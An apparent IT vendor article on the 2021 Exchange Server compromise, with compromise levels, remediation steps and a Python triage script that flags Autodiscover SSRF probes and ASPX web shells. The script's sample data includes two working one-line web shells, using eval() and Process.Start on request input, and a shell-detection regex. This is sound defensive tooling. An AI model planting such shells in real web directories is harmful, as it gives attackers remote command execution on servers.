Microsoft Exchange Email Server Compromise: Background and Solutions

Organizations running on-premises Microsoft Exchange Server 2013, 2016 or 2019 (Exchange 2010 also received a defence-in-depth update) may have been notified about a set of Exchange vulnerabilities whose exploitation began in early January 2021. Microsoft did not provide timely patches and did not release the Exchange updates until 2 March 2021, leaving servers exposed for roughly two months and causing much frustration for users.

Soon afterward, the FBI, the White House, Microsoft and cyber security companies informed the public that intrusions had been occurring throughout January and February, escalating into mass, indiscriminate exploitation of Internet-facing Exchange servers in the last days of February. All of this happened before Microsoft released the patch on 2 March, causing much disruption in the marketplace.

One important point: even though the main target was the Microsoft Exchange email system, other servers on the network could have been compromised as well. Exchange servers are domain-joined and typically hold elevated Active Directory privileges, so an attacker with a foothold on Exchange can use it to reach the rest of the server environment.

Since 2 March, Cycrest has been working around the clock to ensure its clients' systems are secure.

Five main classifications were recognized during this process. The first is no activity detected on the server, meaning the system was not affected in any way. The second is passive activity detected: suspicious Autodiscover entries were found in the Exchange HTTP proxy logs, so an intrusion is possible but less likely. The third is that web shells were dropped on the server, which could lead to future exposure even if they were never used. The fourth is that the web shells were actually used to move, view or steal data. The fifth is that the web shells were used to exploit other systems on the network, or a ransomware attack followed.

In its service to its customers, Cycrest is covering the costs of many aspects of the patching, remediation and investigation process to help ensure its clients' systems are safe, secure and protected.

To help ensure its customers are safe, Cycrest has developed remediation steps for each level of the Exchange Server exploit, and provides customers with every detail of the remediation process that takes place after a suspicious Autodiscover entry is found.

Those steps include: reviewing the logs and running multiple security and exposure scripts; determining to what extent the compromise damaged the server, if the exploit was in fact used; removing any web shells or backdoors found; ensuring all patches are up to date and passwords are changed; and adding tools to help mitigate damage from future zero-day exploits.
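As an added example (not Cycrest's tooling and not code from this page), the Python script below shows how the log review and web shell hunt above can be automated against exported artefacts, and how the findings map onto the five classification levels. It parses Exchange HttpProxy log rows for Microsoft's published indicator of the Autodiscover server-side request forgery (CVE-2021-26855), unauthenticated requests whose AnchorMailbox starts with ServerInfo~, then scans a directory snapshot for ASPX files that pass request parameters into eval() or Process.Start, noting whether they sit in the known drop locations (inetpub\wwwroot\aspnet_client and FrontEnd\HttpProxy\owa\auth). The log lines, file contents and path names are constructed for illustration. Levels 4 and 5 depend on evidence that does not live in these logs (mailbox exports, EDR alerts, ransom notes), so they are supplied as analyst flags rather than inferred.

```python
"""Triage helper for the Exchange log review and web shell hunt described above.

Added example, not Cycrest's tooling. All sample data below is constructed.
"""
import csv
import io
import json
import re

# Constructed sample modelled on the CSV body of an Exchange HttpProxy log
# (...\Logging\HttpProxy\Autodiscover\*.log). Real files carry more columns and
# "#"-prefixed header lines; only the fields this check reads are kept.
# Rows 1-2: unauthenticated probes carrying the ServerInfo~ anchor pattern.
# Rows 3-4: a normal authenticated user, kept as negative cases.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
DateTime,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox
2021-02-28T03:12:44.101Z,203.0.113.7,/autodiscover/autodiscover.xml,,ServerInfo~a]@example.com/autodiscover/autodiscover.xml?#
2021-02-28T03:12:45.317Z,203.0.113.7,/ecp/y.js,,ServerInfo~a]@example.com/mapi/nspi/?#
2021-02-28T08:40:10.002Z,198.51.100.23,/autodiscover/autodiscover.xml,corp\\jsmith,jsmith@example.com
2021-02-28T09:01:55.880Z,198.51.100.23,/owa/,corp\\jsmith,jsmith@example.com
"""

# Constructed directory snapshot (path -> content). The first two files sit in
# directories Microsoft named as common web shell drop locations; the third is
# a stand-in for a legitimate OWA page, kept as a negative case.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["orange"],"unsafe");}</script>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx":
        '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start(Request.Item["c"]); %>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page language="C#" Inherits="Microsoft.Exchange.HttpProxy.OwaPage" %>',
}

# Known drop directories, compared after normalising to lower-case forward slashes.
DROP_DIRS = ("/inetpub/wwwroot/aspnet_client/", "/frontend/httpproxy/owa/auth/")

# A request parameter flowing straight into eval() or Process.Start is the
# signature of the one-line ASPX shells seen in this campaign.
SHELL_PATTERN = re.compile(r"(eval|Process\.Start)\s*\([^)]*\bRequest\b", re.IGNORECASE)

LEVEL_NAMES = {
    1: "no activity detected",
    2: "passive activity: Autodiscover probe only",
    3: "web shell dropped",
    4: "web shell used to move, view or steal data",
    5: "web shell used for lateral movement or ransomware",
}


def find_ssrf_indicators(log_text):
    """Return HttpProxy rows matching Microsoft's published indicator for the
    Autodiscover SSRF (CVE-2021-26855): no authenticated user, and an
    AnchorMailbox of the form 'ServerInfo~<host>/<path>'."""
    body = "\n".join(line for line in log_text.splitlines() if not line.startswith("#"))
    hits = []
    for row in csv.DictReader(io.StringIO(body)):
        anchor = row.get("AnchorMailbox") or ""
        unauthenticated = not (row.get("AuthenticatedUser") or "")
        if unauthenticated and anchor.startswith("ServerInfo~") and "/" in anchor:
            hits.append({"time": row["DateTime"], "client": row["ClientIpAddress"],
                         "url": row["UrlStem"], "anchor": anchor})
    return hits


def find_web_shells(files):
    """Flag ASP/ASPX/ASHX files whose content matches SHELL_PATTERN, recording
    whether each one lives in a known drop directory."""
    findings = []
    for path, content in files.items():
        norm = path.replace("\\", "/").lower()
        if not norm.endswith((".aspx", ".asp", ".ashx")):
            continue
        if SHELL_PATTERN.search(content):
            findings.append({"path": path, "in_drop_dir": any(d in norm for d in DROP_DIRS)})
    return findings


def classify(ssrf_hits, shells, data_access_seen=False, lateral_or_ransom_seen=False):
    """Map the evidence onto the five levels; the two highest need analyst flags."""
    if lateral_or_ransom_seen:
        return 5
    if data_access_seen:
        return 4
    if shells:
        return 3
    if ssrf_hits:
        return 2
    return 1


def triage(log_text, files, **flags):
    """Run both checks and return the level plus the supporting evidence."""
    hits = find_ssrf_indicators(log_text)
    shells = find_web_shells(files)
    level = classify(hits, shells, **flags)
    return {"level": level, "label": LEVEL_NAMES[level], "ssrf_hits": hits, "shells": shells}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_HTTPPROXY_LOG, SAMPLE_FILES), indent=2))
```

Run as-is the sample lands at level 3: two unauthenticated ServerInfo~ probes from one client and two shells in drop directories, with the legitimate logon page left untouched. Feeding real logs means concatenating every HttpProxy log file and walking the real web roots; a level 2 result still warrants the full review, because the logs only show that the server was probed, not what happened next.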

For organizations subject to ISO or SOX compliance requirements, or any company that wants a more thorough investigation, Cycrest can help with engaging a national cyber security company.

Going forward, Cycrest also offers several options to help protect its clients against this type of event, including system behavioural monitoring, network auditing and user software control solutions that can mitigate many such incidents.
